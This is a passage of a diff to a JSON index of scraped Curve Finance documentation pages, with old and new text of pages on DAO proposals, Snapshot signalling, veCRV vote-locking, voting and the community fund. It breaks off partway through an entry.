Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Proposals Table of contents Proposals Creating a proposal Type of votes Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Proposals Creating a proposal Type of votes Proposals Proposals Once CRV holders vote-lock their veCRV, they can start voting on various proposals. Creating a proposal Anybody can create proposals but users need to follow the structure of a proposal which can be found by creating a new topic on the governance forum: https://gov.curve.fi/ Users who create proposals also need to create a corresponding CIP proposal at http://signal.curve.fi/ Using the signalling tool is completely free (no transaction fees) and you only need 1veCRV to create a proposal there. Assuming you have at least 2,500 veCRV, you can also create an official DAO vote as long as it also comes with its topic presenting it on the governance forum. Voting Type of votes Currently there are two type of votes: Signalling votes which are non-official votes only used to gauge interest from community ( https://signal.curve.fi/#/ ) Official DAO votes are the only way to enact changes on the Curve protocol ( https://dao.curve.fi/ ) Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Proposals Table of contents Creating a proposal Type of votes Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Creating a proposal Type of votes Home Governance Proposals Proposals Once CRV holders vote-lock their veCRV, they can start voting on various proposals. Creating a proposal Anybody can create proposals but users need to follow the structure of a proposal which can be found by creating a new topic on the governance forum: https://gov.curve.fi/ Users who create proposals also need to create a corresponding CIP proposal at http://signal.curve.fi/ Using the signalling tool is completely free (no transaction fees) and you only need 1veCRV to create a proposal there. Assuming you have at least 2,500 veCRV, you can also create an official DAO vote as long as it also comes with its topic presenting it on the governance forum. Voting Type of votes Currently there are two type of votes: Signalling votes which are non-official votes only used to gauge interest from community ( https://signal.curve.fi/#/ ) Official DAO votes are the only way to enact changes on the Curve protocol ( https://dao.curve.fi/ ) 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1986,7 +1994,7 @@ { "title": "Snapshot", "html_url": "https://resources.curve.fi/governance/snapshot/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Snapshot Table of contents Snapshot Voting Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Snapshot Voting Snapshot Snapshot Snapshot is a signalling tool that allows governance participants to signal for free. As gas fees are here to stay on the Ethereum blockchain, Curve governance is now using a tool called Snapshot to allow governance users to signal their preferences on Curve proposals. Whilst this tool doesn't replace governance and will only be used to signal, it's a great way for holders of all sizes to make their voices heard as voting is completely free. Voting Head over to the signalling tool: https://signal.curve.fi/#/curve and connect your Metamask wallet. It should be the one where you hold your veCRV (vote locked CRV). Simply review your proposal, select your preferred option and click Vote: You will be prompted by Metamask to sign a transaction which is completely free and your voting vote will be counted according to your voting weight at the moment of the proposal creation. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Snapshot Table of contents Voting Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Voting Home Governance Snapshot Snapshot is a signalling tool that allows governance participants to signal for free. As gas fees are here to stay on the Ethereum blockchain, Curve governance is now using a tool called Snapshot to allow governance users to signal their preferences on Curve proposals. Whilst this tool doesn't replace governance and will only be used to signal, it's a great way for holders of all sizes to make their voices heard as voting is completely free. Voting Head over to the signalling tool: https://signal.curve.fi/#/curve and connect your Metamask wallet. It should be the one where you hold your veCRV (vote locked CRV). Simply review your proposal, select your preferred option and click Vote: You will be prompted by Metamask to sign a transaction which is completely free and your voting vote will be counted according to your voting weight at the moment of the proposal creation. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -1994,15 +2002,15 @@ { "title": "Understanding governance", "html_url": "https://resources.curve.fi/governance/understanding-governance/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Understanding governance Table of contents Understanding Governance Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Understanding Governance Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Understanding governance Understanding Governance Voting on the Curve DAO To vote on the Curve DAO, users need to lock vote lock their CRV. By doing so, participants can earn a boost on their provided liquidity and vote on all DAO proposals. Users who reach a voting power of 2500 veCRV can also create new proposals. There is no minimum voting power required to vote. Voting Power veCRV stands for vote escrowed CRV, it's a locker where users can lock their CRV for different lengths of time to gain voting power. Users can lock their CRV for a minimum of week and a maximum of four years. As users with long voting escrow have more stake, they receive more voting power. The DAO Dashboard You can visit the Curve DAO dashboard at this address: https://dao.curve.fi/dao On this page, you can find all current and closed votes. All proposals should have a topic on the Curve governance forum at this address: https://gov.curve.fi/ Submitting proposals If you wish to create a new official proposal, you should draft a proposal and post it on the governance forum. You must also research that it's possible and gauge interest of the community via the Curve Discord, Telegram or Governance forum. If you're not sure about the technical details of submitting your proposal to the Ethereum blockchain, you can ask a member of the team to help. Emergency DAO The emergency DAO multisig may kill non-factory pools up to 2 months old. It may also kill reward gauges at any time, setting its rate of CRV emissions to 0. Pools that have been killed will only allow users to remove_liquidity . See the members of the emergency DAO in the technical docs: https://docs.curve.fi/curve_dao/ownership-proxy/Agents/#agents The Curve DAO may override the emergency DAO decision of killing a pool, making it alive again. Last update: 2023-09-12 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Understanding governance Table of contents Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Voting on the Curve DAO Voting Power The DAO Dashboard Submitting proposals Emergency DAO Home Governance Understanding governance Voting on the Curve DAO To vote on the Curve DAO, users need to lock vote lock their CRV. By doing so, participants can earn a boost on their provided liquidity and vote on all DAO proposals. Users who reach a voting power of 2500 veCRV can also create new proposals. There is no minimum voting power required to vote. Voting Power veCRV stands for vote escrowed CRV, it's a locker where users can lock their CRV for different lengths of time to gain voting power. Users can lock their CRV for a minimum of week and a maximum of four years. As users with long voting escrow have more stake, they receive more voting power. The DAO Dashboard You can visit the Curve DAO dashboard at this address: https://dao.curve.fi/dao On this page, you can find all current and closed votes. All proposals should have a topic on the Curve governance forum at this address: https://gov.curve.fi/ Submitting proposals If you wish to create a new official proposal, you should draft a proposal and post it on the governance forum. You must also research that it's possible and gauge interest of the community via the Curve Discord, Telegram or Governance forum. If you're not sure about the technical details of submitting your proposal to the Ethereum blockchain, you can ask a member of the team to help. Emergency DAO The emergency DAO multisig may kill non-factory pools up to 2 months old. It may also kill reward gauges at any time, setting its rate of CRV emissions to 0. Pools that have been killed will only allow users to remove_liquidity . See the members of the emergency DAO in the technical docs: https://docs.curve.fi/curve_dao/ownership-proxy/Agents/#agents The Curve DAO may override the emergency DAO decision of killing a pool, making it alive again. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Vote locking boost", + "title": "Vote-locking FAQ", "html_url": "https://resources.curve.fi/governance/vote-locking-boost/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Vote locking boost Table of contents Vote Locking What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost records voting power changes? How can I apply my boost? How to know my boost is active? Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Vote Locking What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost records voting power changes? How can I apply my boost? How to know my boost is active? Vote locking boost Vote Locking Answering all your burning questions about the vote locking boost What is vote locking? CRV holders can vote lock their CRV into the Curve DAO to receive veCRV. The longer they lock for, the more veCRV they receive. Vote locking allows you to vote in governance, boost your CRV rewards and receive trading fees. What is the vote locking boost? When vote locking CRV, you will also earn a boost on your provided liquidity of up to 2.5x. The goal is to incentivise users to participate in governance by rewarding them with a bigger share of the daily CRV inflation. When does the boost start? The boost will start on the 26 th of August 2020 around 11pm UTC. What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Each CRV locked for four years is equal to 1 veCRV. The number of veCRV you will receive depends on how long you lock your CRV for. The minimum locking time is one week and the maximum locking time is four years. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker How is your boost calculated? To reach your maximum boost of 2.5x, there are several parameters to take into consideration. You can find the current DAO voting power at this address: https://dao.curve.fi/locker You can find a calculator at this address: https://dao.curve.fi/minter/calc What if I provide liquidity in multiple pools? Your voting power applies to all gauges but may produce different boosts based on how much liquidity you are providing and how much total liquidity the pool has. What happens if more people vote lock? If other liquidity providers vote lock more CRV, your boost will stay what it was when you applied it. If you abuse this, another user can kick and force a boost update to take you down to your real boost. How often does my boost records voting power changes? Your voting weight decreases over time but your boost will take notice of your decreasing voting power at certain checkpoints like withdrawing, depositing into a gauge or minting CRV. For example if you start at 1000 veCRV and your voting power decreases to 800 veCRV, your boost will still use your original voting power of 1000 veCRV until a user checkpoint. How can I apply my boost? After creating or adding to your lock, you need to click the apply boost button to update your boost on each of the gauge you're providing liquidity in. Your boost can also be updated by depositing or withdrawing from a gauge. Click below for a guide on how locking and boosting your CRV rewards Boosting your CRV Rewards How to know my boost is active? If your boost is showing then it is active. If you have locked but your boost isn't showing then you need to apply it. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Vote-locking FAQ Table of contents What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost records voting power changes? How can I apply my boost? How to know my boost is active? Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost records voting power changes? How can I apply my boost? How to know my boost is active? Home Governance Vote-locking FAQ Answering all your burning questions about the vote locking boost What is vote locking? CRV holders can vote lock their CRV into the Curve DAO to receive veCRV. The longer they lock for, the more veCRV they receive. Vote locking allows you to vote in governance, boost your CRV rewards and receive trading fees. What is the vote locking boost? When vote locking CRV, you will also earn a boost on your provided liquidity of up to 2.5x. The goal is to incentivise users to participate in governance by rewarding them with a bigger share of the daily CRV inflation. When does the boost start? The boost will start on the 26 th of August 2020 around 11pm UTC. What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Each CRV locked for four years is equal to 1 veCRV. The number of veCRV you will receive depends on how long you lock your CRV for. The minimum locking time is one week and the maximum locking time is four years. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker How is your boost calculated? To reach your maximum boost of 2.5x, there are several parameters to take into consideration. You can find the current DAO voting power at this address: https://dao.curve.fi/locker You can find a calculator at this address: https://dao.curve.fi/minter/calc What if I provide liquidity in multiple pools? Your voting power applies to all gauges but may produce different boosts based on how much liquidity you are providing and how much total liquidity the pool has. What happens if more people vote lock? If other liquidity providers vote lock more CRV, your boost will stay what it was when you applied it. If you abuse this, another user can kick and force a boost update to take you down to your real boost. How often does my boost records voting power changes? Your voting weight decreases over time but your boost will take notice of your decreasing voting power at certain checkpoints like withdrawing, depositing into a gauge or minting CRV. For example if you start at 1000 veCRV and your voting power decreases to 800 veCRV, your boost will still use your original voting power of 1000 veCRV until a user checkpoint. How can I apply my boost? After creating or adding to your lock, you need to click the apply boost button to update your boost on each of the gauge you're providing liquidity in. Your boost can also be updated by depositing or withdrawing from a gauge. Click below for a guide on how locking and boosting your CRV rewards Boosting your CRV Rewards How to know my boost is active? If your boost is showing then it is active. If you have locked but your boost isn't showing then you need to apply it. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2010,7 +2018,7 @@ { "title": "Voting", "html_url": "https://resources.curve.fi/governance/voting/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Voting Table of contents Voting How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Voting How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Voting Voting How to participate in governance? To participate in governance, Curve Finance users need to lock their CRV into a voting escrow. You can do so at this address: https://dao.curve.fi/locker What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker Get more voting power by locking your CRV for a longer period of time. Can I start voting right away? You can only vote using your voting weight at the block where a proposal was created. How to vote? Simply visit the proposal of your choice, click your vote option and confirm your transaction. You can find DAO proposals at this address: https://dao.curve.fi/dao Where can I find out about governance? You can visit the Curve Finance governance forum at this address http://gov.curve.fi/ Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Voting Table of contents How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Home Governance Voting How to participate in governance? To participate in governance, Curve Finance users need to lock their CRV into a voting escrow. You can do so at this address: https://dao.curve.fi/locker What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker Get more voting power by locking your CRV for a longer period of time. Can I start voting right away? You can only vote using your voting weight at the block where a proposal was created. How to vote? Simply visit the proposal of your choice, click your vote option and confirm your transaction. You can find DAO proposals at this address: https://dao.curve.fi/dao Where can I find out about governance? You can visit the Curve Finance governance forum at this address http://gov.curve.fi/ 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2018,23 +2026,23 @@ { "title": "Community fund", "html_url": "https://resources.curve.fi/governance/proposals/community-fund/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Community fund Table of contents Community Fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Community Fund Community fund Community Fund CRV initial distribution allowed for a community fund of around $151M to be used in cases of emergencies or awarded to community-lead initiatives. The Curve DAO can decide to award part of this fund through a proposal. Creating a DAO proposal If you have a project you feel is deserving a grant, please create a proposal or come discuss it with a team member on Discord or Telegram. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Community fund Table of contents Community Fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Community Fund Home Governance Proposals Community fund Community Fund CRV initial distribution allowed for a community fund of around $151M to be used in cases of emergencies or awarded to community-lead initiatives. The Curve DAO can decide to award part of this fund through a proposal. Creating a DAO proposal If you have a project you feel is deserving a grant, please create a proposal or come discuss it with a team member on Discord or Telegram. 2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Creating a dao proposal", + "title": "Creating a DAO proposal", "html_url": "https://resources.curve.fi/governance/proposals/creating-a-dao-proposal/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Creating a dao proposal Table of contents Creating a DAO proposal Creating your vote Creating your proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Creating a DAO proposal Creating your vote Creating your proposal Creating a dao proposal Creating a DAO proposal Official DAO proposals are the only way to create enforceable change on the Curve protocol. There are currently two type of votes: parameter and text. Parameter votes are automatically committed to the DAO three days after they are enacted at the end of the vote. Text proposals are different as they will often necessitate development. For those, it is recommended to discuss with the Curve team to understand feasibility and create a signalling proposal. To create a new DAO proposal, you need at least 2,500 veCRV (2,500 CRV locked for four years or 10,000 CRV locked for one year). Creating your vote Visit the Curve DAO: https://dao.curve.fi/dao , select your type of vote and submit it. Creating your proposal Every DAO proposal must be accompanied with a proposal on the Curve governance forum. Visit the proposal section: https://gov.curve.fi/c/proposals/8 and click \"New Topic\" . You will then be presented with a template to help you present your proposed choices to the community. After that's done, be sure to engage with members of the community who have questions about your proposal. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Despositing into the tri-pool Despositing into a metapool Despositing into the susd-pool Despositing into a cryptoswap-pool Despositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Creating a DAO proposal Table of contents Creating a DAO proposal Creating your vote Creating your proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool 